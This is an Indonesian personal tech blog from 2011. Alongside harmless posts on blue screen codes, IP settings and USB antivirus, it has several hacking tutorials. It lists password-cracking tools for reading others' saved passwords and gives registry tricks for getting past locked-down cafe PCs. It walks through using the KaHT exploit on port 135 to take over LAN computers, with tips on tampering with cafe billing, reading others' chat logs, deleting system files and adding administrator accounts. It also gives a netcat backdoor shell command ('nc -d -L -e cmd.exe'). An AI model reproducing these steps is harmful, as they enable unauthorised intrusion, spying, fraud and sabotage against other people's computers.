9.oiya..nih ada info tambahan..kamu bisa taruh di flashdisk kamu..masukkan yang penting2..lalu kamu hide cara'a klik kanan pada file/properties/klik atau centangi pilihan Hidden..klik ok.maka filenya akan hilang...dan cara membukanya..........maaf anda cari di search engine aja ya atau Google..kaeran susah untuk di jelaskan,dan saya tidak mengerti bahasa untuk menjelaskannya...

Selamat Mencoba,semoga berhasil,

Baca-baca yang lainnya di Blog aku ya guys..See You

Sep 9, 2011

Software Pembobol Password

Hallo..kali ini saya akan membahas tentang Membobol password-password.
langsung saya beri tahu saja ya nama2 software'a

1. PDF Password

PDF Password dapat membongkar password yang melindungi file PDF. Program ini hanya mampu membongkar User permission password. PDF Password tidak dapat menerobos DRM (Digital Right Management) atau perlindungan copy digital pada PDF. Jika sebuah dokumen PDF tidak bisa dibuka karena dilindungi password, program ini dapat membongkarnya dengan mudah.

2. Windows Password Cracker


Windows Password Cracker dapat dengan mudah membobol password yang tidak terenkripsi dengan baik di sistem operasi windows. Windows password cracker dilengkapi dengan 53.000 kata berbahasa inggris sebagai ditctionary attack. Sebuah program sederhana namun cepat untuk membongkar password windows.

3. Atomic ZIP Password Cracker


Program ini digunakan untuk membongkar password file berformat ZIP. Atomic ZIP Password Cracker dapat dengam mudah menemukan password file ZIP dengan berbagai metode, yaitu Brute force atau penyerangan terus menerus atau dengan dictionary attack. Interface program ini juga mudah digunakan selain kecepatan pembongkaran password yang ditawarkan.

4. Nucleus Kernel SQL Password Recovery


Program ini digunakan untuk membuka password MDF (Master Data File) dari database SQL Server 2000. Nucleus Kernel SQL Password Recovery mampu mengembalikan semua password SQL yang tersimpan di sistem. File MDF sebenarnya diproteksi dengan algoritma password yang cukup kuat. Tidak mudah untuk mengenskripsi passwordnya kembali. Namun demikian, program ini mampu merekursif password dan secara otomatis menggeneratenya. Hasilnya dibuat sebuah password alternatif sebagai pengganti password aslinya. Keren bukan.

5. Password recovery for microsoft office


Seperti namanya, program ini mampu membongkar password dokumen microsoft office. Hampir seluruh jenis file microsoft office, baik Microsoft office word, excel, power point, access dan tentunya outlook. Dari percobaan yang saya lakukan, program ini mampu membuka kombinasi password 6 karakter dengan cepat.

6. Windows password unlocker


Windows password unlocker sepertinya adalah jagoan saya. Program ini adalah pelopor pembobol login administrator windows dengan tampilan grafis. Tidak seperti program lain yang umumnya berbasis text, Windows password unlocker mampu membobol password login windows 2000/2003/NT/XP/Vista dan tentunya windows 7. Tidak perlu melakukan instalasi ulang sistem operasi anda, cukup gunakan program ini yang dibooting dari CD, kemudian ikuti langkah-langkah mudahnya.

7. RAR Password Recovery


RAR Password recovery mampu diandalkan sebagai pembongkar password file berformat RAR. Dilengkapi dengan tiga teknik pembobol password umum seperti Brute force, boost up dan dictionary attack. RAR Password Recovery juga dilengkapi resume progress yang dapat mengulang proses pembobolan password di lain waktu.

8. MessenPass


MessenPass seperti namanya digunakan untuk mengobok-obok password messenger client seperti Yahoo Messenger, MSN Messenger, Trilian, Miranda, Google Talk, dll. MessenPass hanya mampu membobol password messenger yang disetting "remember password", selain itu program ini hanya berjalan di komputer lokal. Artinya untuk membobol password messenger seseorang, anda harus secara fisik menguasai komputer lawan.

9. Asterik Logger


Asterik Logger digunakan untuk mendapatkan password yang tersembunyi di balik asterik (bintang). Beberapa program seperti FTP Clinet, dan Mail Client biasanya menampilkan ******* pada kotak password. Dengan program ini anda dapat menampilkan password dibalik bintang tersebut.

10. PasswordFox


Dari namanya mungkin anda telah bisa menebaknya. Benar sekali Password Fox digunakan untuk memunculkan password yang tersimpan di dalam browser mozilla firefox. Kebiasaan seseorang yang menyimpan password di cache memory web browser dapat dimanfaatkan untuk diintip passwordnya
menggunakan Password Fox.

Trimakasih..maaf ya saya tidak memberi gambarnya..saya sedang tergesa2..
saya hanya ingin membagikan info ini..dan anda bisa mendownload di www.Google.com
ok. ^_^
semoga berhasil..
gunakan dengan sebaik-baiknya..Tuhan Bersertamu

Sep 8, 2011

Remote komputer dengan Telnet


Telnet merupakan fitur lama yang dipakai untuk meremote sebuah host melalui command line. Telnet bekerja melalui port 23. bila kita dapat masuk ke komputer lain dengan telnet, maka kita dapat melakukan banyak hal layaknya kita berhadapan muka dengan komputer tujuan.


Pada contoh kali ini kita akan mencoba meremote komputer lain dalam sebuah jaringan LAN. komputer saya memiliki IP Address 192.168.1.3, sedangkan komputer tujuan yang akan kita remote memiliki IP Address 192.168.1.4.




Untuk melakukan koneksi melalui fasilitas telnet, terlebih dahulu pada komputer yang akan diremote (192.168.1.4) dijalankan dulu service telnet-nya. jika ia menggunakan Sistem Operasi Windows XP, cara mengaktifkannya adalah : Start => Control Panel => Addministrative tools => Services => Telnet.
Pada jendela baru yang terbuka, pada bagian Startup Type pilih "Manual", setelah itu klik "Apply", Kemudian pilih Tombol "Start" dan terakhir klik tombol "Ok"




Jika service sudah dijalankan, maka dari komputer yang akan meremote (192.168.1.3 ) kita tinggal membuka CMD atau program sejenis dan menuliskan syntax "TELNET 192.168.1.4". jika ada pertanyaan "You are about to send your password information to a remote computer in Internet zone. This might not be safe. Do you want to send anyway(y/n):", jawab saja dengan menekan "N" lalu tekan Enter
Tidak lama kemudian kita akan diwajibkan mengisi username dan password dari User Account komputer tujuan. seperti contoh kali ini, user 192.168.1.4 memiliki Account Windows XP dengan nama "Gue" dan Password "abc12". setelah memasukkan kata sandi ini dengan benar, maka posisi CMD saya kali ini tidak lagi berada pada komputer 192.168.1.3, namun pada komputer tujuan yaitu 192.168.1.4. ini dapat dibuktikan dengan menjalankan perintah "Dir" untuk melihat isi direktori yang ada.




selanjutnya, saya bisa melakukan apa saja kepada komputer tujuan ini melalui komunikasi telnet, baik sekedar meng-copy file, membuat backdoor, atau bahkan menghapus file sistem yang ada, semua tergantung penguasaan anda dalam perintah command line.

Bagaimana?,cukup mudah bukan ?asaln anda serius pasti akan berhasil

Sep 5, 2011

Mengetahui NetCut User Dan Cara Mengatasinya

NetCut adalah sebuah aplikasi yang beroperasi pada sistem operasi windows (sesuai pengalaman penulis) yang dapat memutuskan koneksi para user-user di area jaringan wiFi.

Secara singkat, NetCut bekerja pada ARP (Address Resolution Protocol) spoofing. NetCut bekerja dengan menjadikan komputernya sebagai gateway atau gerbang pada jaringan. Kedua hal ini menjadikan komputer user NetCut dapat bebas memberikan izin kepada user lain untuk dapat melakukan aktifitas pada jaringan atau malah membuat user lain terputus pada jaringan.

Cara mengetahui apakah ada user yang menggunakan NetCut pada jaringa sebenarnya adalah hal yang gampang-gampang sulit.

Apabila user NetCut telah memulai aksinya (dalam hal ini terdapat komputer yang aksesnya terbatas), maka hal yang sebaiknya dilakukan adalah men-scan semua IP address dan MAC address yang tercatat pada jaringan. Bisa dengan menggunakan aplikasi yang anda miliki atau dengan menggunakan Advance IP Scanner yang dapat di download di sini.
Lakukan ping dari komputer korban menggunakan fasilitas yang telah disediakan windows dengan membuka menu “run” (tanpa petik) dan pada textbox ketik ping ip_address_address_yang_dituju -t. Sebagai contoh ping 192.168.1.23 -t (masukan ip address yang dituju dengan menggunakan daftar IP addres yang telah discan sebelumnya). Tunggu hingga beberapa detik, jika pada layar tetulis “Request Time Out” bisa dikatakan bahwa User dengan IP addres tersebut bukan pengguna NetCut. Namun jika yang tertulis pada layar adalah “Reply from 192.168.1.23: bla bla“. Maka user dengan IP address tersebut patut dicurigai. Logikanya adalah jika diCut dengan aplikasi NetCut koneksi korban tidak teputus secara total. Sehingga si korban masih tetap dapat melakukan aktifitas pada gateway. Karena user NetCut bertindak sebagai gateway, maka user dengan IP address yang Reply tadi mungkin saja menggunakan NetCut.
Mungkin saja cara diatas dapat dilakukan pada jaringan dengan pengguna yang sedikit. Sebab jika dalam jaringan terdapat 100 pengguna maka proses mencarinya akan semakin lama. Oleh sebab itu kita dapat menggunakan aplikasi yang telah disediakan oleh windows, apalagi kalau bukan CommandPrompt. Langkah-langkahnya adalah :

Jalankan commandprompt dengan mengklik tombol START >> RUN.
Pada TextBoxt ketikkan “cmd” (tanpa petik”).
Pada layar command prompt, ketik “arp -a” (juga tanpa petik). Maka pada layar akan tampil IP address anda dan gateway. Jika pada daftar terdapat dua gateway, maka sebaiknya komputer user tersebut diperiksa, apakah benar dia menggunakan NetCut.
Selain cara mengetahui pengguna NetCut ada baiknya jika kita juga menggetahui cara mengatasinya. Ada banyak cara yang disarankan, diantaranya adalah :

Sembunyikan IP address dengan menggunakan XP-AntiSPy yang dapat didownload disini.
Gunakan aplikasi antiNetCut yang juga dapat didownload disini.
Gunakan jaringan yang berada ditempat yang jauh, dalam hal ini yang penulis maksudkan adalah dengan server proxy.
Jika komputer kita sudah menjadi korban, ganti IP address anda dengan IP address yang baru.

Smoga Berhasil...^_^

Mengganti Ip Address Windows Xp

Mengganti alamat IP Address bukanlah sesuatu yang mudah, walau anda ahli informatika. Sekadar sharing informasi…khusus untuk mereka yang belum bisa mengubah alamat IP di komputer sendiri.

Kita bisa mengganti alamat IP baik dengan menggunakan command line maupun dengan menu GUI yang sudah disediakan dalam sistem operasi. Di Windows XP misalnya, mudah sekali mengganti alamat IP komputer kita. Cukup dengan menggunakan menu grafis yang ada. Mari belajar bersama-sama bagaimana cara mengganti IP Address


Lihat gambar screenshot contoh tahapan mengisi alamat IP berikut :


Langkah-langkahnya adalah :

Klik Start, pilih Control Panel
Pilih Network Connections. Pilih di sini maksudnya dengan double click.
Pilih network interface yang kita gunakan, misalnya pilih Local Area Connection jika kita terhubung ke network dengen menggunakan Ethernet.
Klik menu Properties pada tampilan window yang muncul.
Pilih menu Internet Protocol (TCP/IP). Di sini akan ada tampilan menu untuk menentukan sendiri alamat IP.
Pilih Use the following IP address dan isikan alamat IP yang diinginkan (alamat IP, netmask, default gateway jika diperlukan, dan alamat DNS jika perlu terhubung ke Internet).
Kalau sudah tutup semua window yang tadi sudah Anda buka dengan memilih OK/Close.

Di UNIX kita bisa mengatur alamat IP dengan command line (walaupun di beberapa varian UNIX sudah disediakan menu grafis untuk menentukan alamat IP). Berikut langkah untuk mengatur alamat IP di Solaris 10 :

1. Jalankan perintah ifconfig seperti berikut ini :

# ifconfig fjgi0 172.16.209.122 netmask 255.255.255.128 broadcast + up

2. Edit file # vi /etc/hosts, format isi file /etc/hosts adalah “ip hostname“. Seperti berikut ini (asumsi alamat IPnya 172.16.209.122 dan hostname-nya adalah “smc“):

# vi /etc/hosts
172.16.209.122 smc

3. Edit file # vi /etc/inet/hosts, format isi file /etc/inet/hosts adalah "ip" dan "netmask". Seperti berikut ini (asumsi alamat IPnya 172.16.209.122 dan hostname-nya adalah “smc“) :

# vi /etc/inet/hosts
172.16.209.122 smc

4. Kalau nama hostname berubah, jangan lupa mengganti file /etc/hostname.fjgi0 (asumsi koneksi menggunakan interface fjgi0; nama interface tergantung sistem operasi. Ethernet misalnya kadang diberi nama hme0 atau eth0) :

# vi /etc/hostname.fjgi0
smc

Format isi file /etc/hostname.interface adalah "hostname".
5. Jika netmask yang digunakan berubah, jangan lupa mengubah juga isi file /etc/inet netmask.

# vi /etc/inet/netmasks
172.16.209.122 255.255.255.128

Format isi file /etc/inet/netmasks adalah "ip" dan "netmask".
6. Ubah file /etc/inet/ipnodes seperti berikut ini :

# vi /etc/inet/ipnodes
172.16.209.122 smc

Format isi file /etc/inet/ipnodes adalah adalah "ip" dan "hostname".

Untuk sementara yang windows saja ya.

Sep 4, 2011

Cara Melacak IP ADDRESS dan REAL ADDRESS Seseorang Artikel ini ditulis karena terinspirasi pertanyaan om Rasters tentang bagaimana cara melacak IP address suatu situs. Dalam artikel ini Spyro akan membahas hal-hal berikut: 1. Melacak alamat IP suatu situs 2. Melacak Real Adress server suatu situs 3. Cara Mengetahui IP address lawan chatting kita (:::::—– Pembahasan —–:::: 1. Melacak alamat IP suatu situs Untuk mengetahui alamat IP suatu situs, kita dapat melakukan PING terhadap situs tersebut. Caranya: Masuk ke command Prompt dan ketikan PING WWW.SITUS-YANG-DILACAK.COM lalu tekan enter. Maka akan muncul alamat Ip situs tersebut. 2. Melacak Lokasi server (real address) suatu situs Kita dapat melacak lokasi server suatu situs hanya dengan mengetahui alamat situsnya saja. Coba anda buka www.domainwhitepages.com Tinggal masukkan IP address situs tadi atau masukkan alamat situsnya dan anda akan mendapatkan info lengkap tentang server dari situs tersebut diantaranya adalah lokasi negara dan kota. 3. Melacak IP address lawan chatting kita Saat kita menggunakan Yahoo messenger, sebenarnya kita bisa mengetahui alamat IP dari lawan chatting kita. Caranya: :: Kirimkan suatu file pada lawan chat kita. :: Lalu masuklah ke Command Prompt (MSDOS) dan ketikkan NETSTAT -N lalu tekan enter, maka alamat IP lawan chatting anda (yang telah anda kirimi file tadi) akan muncul beserta port yang digunakan untuk pengiriman file. :: Untuk mengetahui lokasi lawan chatting anda (real address) seperti ia berada di kampus atau di warnet mana, tinggal anda chek di www.domainwhitepages.com dengan mempergunakan alamat IP yang anda dapatkan. *Ingin menggunakan YM untuk beberapa user id di komputer yang sama? Anda bisa menggunakan software dan juga bisa dengan trik di bawah ini: 1. Start > Run…> regedit 2. Buka HKEY_CURRENT_USER > Software > yahoo > pager > test 3. Pada sebelah kanan, klik kanan > New > DWORD value 4. Beri nama Plural tekan enter 2 kali dan berikan nilai 1 5. Pastikan YM anda telah dimatikan, jalankan YM dan login secara biasa. 6. Kalau masih tidak bisa coba lagi step ke-5, kalau masih tidak bisa RESTART Tutorial Hacker Part 2 : Melacak ip addreas di yahoo Mesengger dan mesengger lainnya Banyak para Newbie tidak tahu cara menampilkan ip addreas teman chatnya di Yahoo Messenger, AOL dan lainnya, memang untuk melakukannya kita butuh triks, berbeda dengan IRC yang tinggal di whois aja, baik langsung saja kita memulai tutorialnya, pertama-tama kirimkankan file apa saja yang anda punya ke teman chatting anda dimana ini fungsinya sebagai timing waktu agar anda punya waktu untuk mengetikkan perintah-perintah untuk menampilkan ip addreas teman chat anda, disarankan diatas 600kb, lebih besar itu lebih bagus karena itu akan menyebabkan waktu anda lebih banyak. 1.Segera buka MS-DOS anda, lalu ketikkan netstat -n lalu akan tampil ip teman chat anda, misalkan saja muncul tampilan sebagai berikut : 202.133.80.45 : 5000+++ ->> ip ini ( 202.133.80.45) ternyata setelah dicek itu milik Graha Net, nah ahkirnya ketahuan tuh si pemakai messenger di warnet mana, nah kalau 5000+ itu adalah portnya yang dikirimin file ama anda. Tujuan dari tutorial ini bahwa segala macam komunikasi diinternet tanpa penggunaan proxy dan semacamnya masih dapat dilacak dengan begitu mudahnya, sehingga gue mengingatkan untuk penggunaan proxy anonymous setiap anda berselancar di internet jika anda benar-benar ingin mengurangi resiko dari berbagai jenis pelacakan. 2. Cara masuk ke DOS pada Windows XP yang serba dikunci Banyak warnet yang membatasi akses gerak kita di Windows seperti fasilitas DOS, Windows Explorer, setting dan sebagainya dalam keadaan tidak dapat kita sentuh, huh, emang nyebelin kalo kita bener-bener perlu akses ini Gue punya jawaban Cara masuk di DOS pada Windows XP yang serba di lock fasilitasnya : 1. Pada icon dalam dekstop atau start menu di klik kanan, lalu pilih properties 2. Di properties pilihlah "find target…" 3. Muncul Window lalu pilih search diatas 4. Pada Search pilihlah "All Files and folders" 5. Lalu cari file "cmd.exe" di windows 6. Jika di temukan maka jalankan file cmd.exe. 7. Dengan menjalankan file cmd.exe maka anda telah masuk ke dos Jika ternyata penguncian benar-benar total maka anda dapat mengubah registry windows melalui pembuatan file *.reg dengan notepad / word pad, kemudian anda jalankan file *.reg tersebut, cara untuk membuatnya ada dihalaman ini juga. Tujuan dari tutorial ini agar kita dapat lebih banyak bergerak leluasa diwarnet-warnet yang keamanannya terlalu dilindungi sehingga membuat kita tidak bisa berbuat banyak di komputer tersebut. 3. Menembus fasilitas umum windows yang terlalu dibatasi Menjengkelkan jika fasilitas MS-DOS, RUN, Find dan sebangsanya di hilangkan dari desktop di komputer warnet, biar ga terlalu BT, kita tembus aja pakek cara ini 1. Masuk ke Notepad / Wordpad / Ms Word 2.Laluketik dibawah ini REGEDIT4 [HKEY_CURRENT_USER\""SOFTWARE\""Microsoft\""Windows\""CurrentVersion\""Policies\""System] "DisableRegistryTools"=dword:00000001 [HKEY_CURRENT_USER\""SOFTWARE\""Microsoft\""Windows\""CurrentVersion\""Policies\""Explorer] "NoRun"=dword:00000000 3. Simpanlah di dengan nama file berekstensi *.reg lalu jalankan file *.reg yang anda buat tadi lalu anda restart Tujuan dari tutorial ini untuk para netter yang merasa kesal dengan komputer warnet, kantor atau sebagainya yang dimana warnet, kantor atau lainnya melakukan pembatasan hak aksesnya terlalu berlebihan terhadap komputer yang kita gunakan. 4. Cara masuk di komputer lain lewat DOS (Windows XP / 2000) Anda ingin masuk dikomputer teman anda dalam sebuah LAN ? bisa melihat seluruh isi harddisk teman anda, membuat directory, membuat file, mendelete file atau apa saja ? itu mudah, semua caranya ada disini. 1.Pertama-tama anda harus tahu 2 program penting lalu downloadlah yaitu internet Maniac (Internet Maniac.exe) … Download Interenet Maniac Berfungsi untuk mengetahui ip addreas client melalui computer name / hostname KaHT (KaHt.exe) … Download program hacker KaHT Berfungsi sebagai program untuk menerobos ke computer server atau client Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe Pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara. Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe Setelah 2 program diatas di download maka ekstractlah dahulu program tersebut, entah pake WINZIP atau pake apa. Kalo udah di extract lalu pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara. Untuk Windows XP Cara Pertama Masuk ke Start Lalu Search, lalu pilih computers or people lalu pilih A computer on the Network lalu langsung klik search maka akan segera muncul computer-komputer yang terkoneksi dalam jaringan. Untuk Windows 95/98/Me/2000 (kalau anda menemukan open port 135 di OS ini) Cara Pertama Masuk ke Start Lalu Search Lalu For Files or Folders lalu pada menu Search for other item pilihlah computers, lalu akan muncul Search for computer, maka langsung klik Search Now maka nama-nama computer akan muncul (Alternatif cara yang cepat dapat mengklik My Network Place / Network Neighboure saja) Setelah loe dapetin sasaran computer yang mau di masukin / diremote maka loe langsung aja jalankan program Internet Maniac Masuklah ke Host Lookup lalu ketikkan nama computer / hostname lalu klik resolve, disini anda akan mendapat alamat ip computer tersebut. Dengan nomor ip ini maka anda sudah mengetahui sasaran computer yang akan di masuki. Setelah itu selesai maka kita tinggalkan program Internet Maniac, kita akan berlanjut dengan program KaHT, program ini akan didetect sebagai Trojan oleh antivirus, tapi abaikan saja, jangan di hapus / di karantina kalau terdetect, kalau perlu del aja antivirusnya, satu lagi, program KaHT bekerja dalam MS-DOS Mode jadi disini kemampuan anda menggunakan DOS sangat penting, tanpa kemampuan DOS maka anda tidak akan bisa banyak berbuat. Cara masuk DOS Mode Untuk Windows XP : Masuklah ke Start, All programs, Accessories lalu Command Prompt Untuk Windows 95/98/Me/NT/2000 Masuklah ke Start, Programs, Accessories lalu MS-DOS Prompt Setelah berhasil masuk DOS maka masuklah di directory program KaHT, masa seh bisa lupa tadi program diextract dimana, hehe, (Misal tadi di extract di C:\""KaH) maka ketikkan "CD\""KaHT" dan seterusnya. Jika sudah, ini saatnya? Ketikkan "KaHT sebelum_no_ip_komputer_sasaran no_ip_komputer_sasaran. kalau bingung bisa begini : "KaHT Ip1 ip2" ip1 : ip awal yang discan ip2 : ip terahkir yang discan Misalnya tadi ip-nya 192.168.0.1 setelah di detect pakek Internet Maniac tadi itu lho. Maka ketikkan saja "KaHT 192.168.0.0 192.168.0.1" lalu enter aja Nah disini nanti program akan bekerja otomatis. Setelah selesai menscan jika nanti port 135 ternyata dalam keadaan open maka anda akan otomatis di computer tujuan / sasaran, untuk lebih persisnya anda akan berada di "c:\""windows\""system" milik komputer tujuan / sasaran setelah pen-scan-an selesai. Anda bisa bebas di computer sasaran, mau edit atau di delete pun bisa, hehe Nah kalo udah begini kita bisa berkreasi : Pingin biaya warnet kita lebih murah ? gampang masuk aja di billing server, ketik Time, ganti aja waktunya, tapi jangan banyak-banyak apalagi minus nanti ketahuan ama operator warnetnya, hehe. Memata-matai anak yang sedang chatting pakek MiRC di satu warnet / kampus / kantor / lainnya, cari program MiRC yang digunakan dalam computer tersebut, biasanya seh di C:\""Program Files\""MiRC, buka file MiRC.INI, lalu Log IRC di On kan saja dan kalo mau lihat isi chattingan teman kita itu cukup lewat "/logs" maksudnya kalau tadi di C:\""program Files\""MiRC program MiRCnya maka cukup masuk aja di C:\""Program Files\""MiRC\""Logs nanti disitu ada file-file log hasil chattingan dia walaupun dia sedang online tetep aja terekam, hehe, kalo mau mastiin dia makek nick apa, gampang banget bisa jalanin aja MiRCnya atau periksa di MiRC.INI, gampangkan. Apalagi nih, Bikin computer itu rusak, lebih baik jangan, tapi sebenere bisa lho, delete aja file-file systemnya, hehe. Diatas cuman kreasi dikit aja, loe bisa aja memanfaatkannya jauh lebih bermanfaat dari pada diatas Tujuan dari tutorial ini untuk anda yang sering menggunakan komputer dengan Windows 2000 dan XP dijaringan agar lebih waspada terhadap berbagai tindakan usil dari pihak-pihak yang tidak bertanggung jawab.. 5.Membuat akses administrator Windows untuk kita lewat komputer lain Kita ingin membuat administrator Windows XP/2000 di komputer lain melalui LAN ? sangat mudah, caranya masuklah ke komputer tujuan dengan program kaht yang sudah diajarkan diatas, lalu kita akan mencoba beberapa trik. Melihat akses guest dan administrator di Windows Ketik : net user Melihat aktif tidaknya guest di Windows Ketik : net user guest Membuat akses guest menjadi Administrator dengan perintah : Ketik : net localgroup Administrators Guest /add Membuat akses adminstrator sendiri : 1. Ketik : net user /add 2. Ketik : net localgroup Administrators /add Menghapus akses administrator Ketik : net localgroup Users /delete 1. Cara mengetahui password administrator Windows - Download Proactive Windows Security Explorer

Mebuat Backdoor Di Windows

Hallo Guys... Pa Kabar'e? ^_^ Mumpung lagi ada waktu sedikit saya mau share sesuatu, mungkin bisa membantu. Malam ini saya mau menjelaskan tentang cara membuat backdoor di Windows (apa saja seperti, xp, vista dan seven), ya biar bisa masuk ke komputer orang lain gitu, tapi jangan di salah gunakan ya… Tanggung jawab itu diluar kewajiban saya lho.. ;) Pertama yang kita butuhkan adalah netcat, download si sini. Kedua extrack file yang tadi sudah di download di komputer yang akan kita buat backdoornya atau komputer target di folder C:\WINDOWS\System32\ Ketiga buka cmd komputer target dan ketikan perintah berikut: nc -d -L -e cmd.exe -p 10001 Itu yang 10001 diganti saja sesuai keinginan Anda, 10001 itu port yang akan di buka netcat untuk kita masuk ke komputer target. Keempat nyalakan komputer Anda. Buka cmd dan ketikan kode berikut: telnet ip-komputer-target port-nya contoh: telnet 192.168.1.1 10001 Treng, sekarang Anda sudah berada di komputer target. Mau diapakan itu terserah Anda, asal jangan melakukan kejahatan ya… ;) silahkan kunjungin artikel yang lainnya disini

Aug 26, 2011

Pesan Error layar Blue screen

Terkadang kita ketika sedang menjalankan komputer atau dalam proses awal booting, muncul pesan dengan layar biru yang isinya pesan error dengan bilangan hexadesimal. Pesan tersebut muncul dikarenakan ada kesalahan, kerusakan atau ketidakcocokan Hardware kita terhadap system komputer kita. Berikut ini adalah pesan - pesan yang muncul jika terjadi kesalahan pada Hardware :



1. IRQL_NOT_LESS_OR_EQUAL (0X0000000A)
Ini merupakan kesalahan yang umumnya terjadi pada Blue Screen Eror, pesan ini yang paling sering muncul. Pesan kesalahan ini disebabkan umumnya kerena ada ketidakcocokan driver yang terinstall di komputer.
Daftar Penyebab:
~ Masalah driver yang compatible atau tidak cocok
~Masalah Video Card, hal ini mencakup video card yang di overclock melebihi batas atau anda baru berganti Video card dan Anda belum menguninstall driver Video card lama dari chipset berbeda
~Masalah Audio Card, meliputi kesalahan konfigurasi atau bug dalam driver sound card
2. NTFS_FILE_SYSTEM atau FAT_FILE_SYSTEM (0X00000024) atau (0X00000023)
Nah, pesan ini setidaknya sudah sedikit “nyambung” memberikan gambaran di mana kerusakan berada, yaitu ada di partisi atau filesystemnya tetapi bukan di harddisknya. Kita bisa melakukan pengecekan dengan memeriksa kabel SATA atau PATA atau bisa mengecek partisi dengan tool chkdsk.
3. UNEXPECTED_KERNEL_MODE_TRAP (0X0000007F)
Bila Anda mendapatkan pesan seperti ini, dapat disebabkan karena:
~Overclock Hardware yang berlebihan
~Komponen komputer yang kepanasan
~BIOS yang korupt
~Memory dan CPU yang cacat
4. DATA_BUS_ERROR
Pesan ini disebabkan karena adanya kemungkinan bahwa memory atau slot memory di motherboard rusak.
5. PAGE_FAULT_IN_NONPAGED_AREA
Disebabkan karena adanya kerusakan hardware, termasuk memory utama, memory video card, atau memory di processor (L2 Cache)
6. INACCESSIBLE_BOOT_DEVICE
Disebabkan karena adanya kesalahan dalam konfigurasi jumper harddisk yang salah, virus boot sector, driver IDE controller yang salah, atau kesalahan driver chipset.
7. VIDEO_DRIVER_INIT_FAILURE
Kesalahan terjadi pada instalasi driver video card yang kurang sempurna, restart pada saat instalasi atau juga dapat terjadi karena kesalahan dalam instalasi driver.
8. BAD_POOL_CALLER
Kesalahan ini dapat terjadi karena kesalahan atau driver yang tidak kompatibel. Sering terjadi saat melakukan instalasi XP dari upgrade, atau bukan dari instalasi baru.
9. PEN_LIST_CORRUPT
Pesan ini disebabkan karena adanya kerusakan RAM
10. MACHINE_CHECK_EXCEPTION
Disebabkan oleh cacatnya CPU, atau yang di overclock secara agresif, serta power supply yang kekurangan daya atau rusak.

Aug 25, 2011

Mengamankan Flashdisk dari virus autorun,dengan Smadav Lock

Berikut Salah satu cara pencegahan agar flash disk agar tidak tertular virus yaitu dengan cara memanfaatkan salah satu fasilitas anti virus portable buatan indonesia yaitu anti virus smadav.

Salah satu fasilitas yang disediakan anti virus smadav yaitu fasilitas Smad-Lock. Dengan Smad Lock ini Maka hampir tidak mungkin virus dapat menembus dan menginfeksi Flash Disk dan file yang ada pada flash disk kita.
Kenapa demikian ? Smadav Smad-Lock akan membuat folder Δ Smad-Lock Δ dan folder autorun.inf yang terproteksi kuat pada flash disk kita. Dengan demikian virus tidak akan mampu masuk dan tidak mampu membuat file auto run untuk menggantikan atau mereplace file auto run yang dibuat oleh Smadav Smad-Lock ini.

Berikut ini langkah untuk mengaktifkan Smadav Smad Lock :

1.Download anti virus Portable SMADAV Disini

2.Extrac dan Jalankan anti virus SMADAV

3.Pilih Tidak bila ada tidak ingin menjalankan fasilitas real time protection.

4.Klik menu tool dan pilih menu Smad Lock.

Pada daftar drive nya pilih dan beri tanda flash disk anda kemudian klik menu Lock
Setelah menjalankan hal ini maka otomatis pada Flash disk akan ada folder dengan nama Δ Smad-Lock Δ dan file auto run.inf (hidden folder file).

Tips penting agar Flash Disk dan Komputer terhindar dari virus :

Simpanlah semua file anda pada folder Δ Smad-Lock Δ. Dan jangan merename atau menghapus folder Δ Smad-Lock Δ dan file autorun.inf (Hidden yang bergambar gembok) yang ada pada flash disk anda tersebut.
Bila anda akan membuka atau menjalankan file pada flash disk anda terlebih dulu anda keluarkan file anda dari folder Δ Smad-Lock Δ, karena file tidak bisa dijalankan selama ada di dalam folder Δ Smad-Lock Δ.
Matikan menu auto Run pada komputer anda. Cara ini untuk menghindarkan Computer kita dari virus yang yang mengunakan metode auto run.

Mematikan Auto run Pada Computer :

Masuk menu Run >>> ketik gpedit.msc >>> enter >> Klik menu computer configuration >>> Administratif template >>> System >>> Doble klik pada Turn Off Autoplay >>> Pilih enable dan turn off auto play on : all drive >>> apply >> OK
Klik menu User configuration >>> Administratif template >>> System >>> Doble klik pada Turn Off Autoplay >>> Pilih enable dan turn off auto play on : all drive >>> apply >> OK

semoga berhasil,dan kunjungi artikel lain'a disini

Mencari Uang Di internet dengan ziddu

Ziddu.com adalah tempat atau server kita menyimpan data dan link yang diberikan secara gratis sehingga bisa di download oleh semua orang dengan cara kita share kepada orang orang melalui blog, website, jejaringan sosial, YM atau yang lainnya. Bagaimana cara mendapatkan Uang dari Ziddu ? Gampang saja kita tinggal upload file atau data yang berupa zip, rar sampai ziddu memberikan Link kepada kita.



Kenapa pake Ziddu !

1. Gratis dan gampang cara kerjanya
2. Tidak terbatas untuk upload file atau unlimited
3. Kita mendapatkan untung $0.001 setiap link yang kita share di download oleh orang , semakin banyak orang mendownload link yang kita share semakin banyak pemasukan uang yang kita dapat dari Ziddu.

Langkah Langkah Mendaftar/Register di Ziddu
1. Klik di sini


2. Setelah masuk ke form pendaftaran ziddu seperti gambar di bawah ini. anda isi sesuai dengan yang di perintahkan




3. Lalu setelah anda selesai klik Submit dan akan tampil layar baru seperti di bawah ini




4. Anda tinggal " Go to My Account " dan anda sudah bisa memulai upload data yang anda inginkan. Seperti Data, Gambar, Mp3, Tutorial, Ebook dsb.





Selain itu anda juga bisa mendapatkan tambahan uang $ 0,1 lagi jika anda mengajak orang untuk daftar ke ziddu melalui Refferal yang anda berikan. Untuk Mendapatkan Link Refferalnya ada bisa cek di Menu Link Reffeal di account ziddu anda , disana akan di kasih banyak pilihan banner berserta kode link refferal yang sebarkan.

Pembayaran Ziddu ?

Ziddu akan membayar anda setelah anda minimal mendapatkan $10 dengan melalui Paypal.

Jika anda belum punya paypal anda bisa daftar di sini

mudah bukan..buruan gabung,semakin cepat,anda dapat mengumpulkan dollar lebih banyak.. ^_^

tirmakasih..kunjungi artikel melindugi mata dari radiasi komputer disini

Aug 24, 2011

Software hacking,lucu,jahil,menarik untukmu

Skrng saya mau bagi-bagi nih software-software kesukaan saya...hahahah


1.win xp mobile
ni software unik,windows xp yang di komputer kini ada di Hp,tapi tidak seuunggul di komputer pastinya,tapi software ini juga ga kalah mengasikan.. kalo penasaran download disini ya

2.win 7 mobile
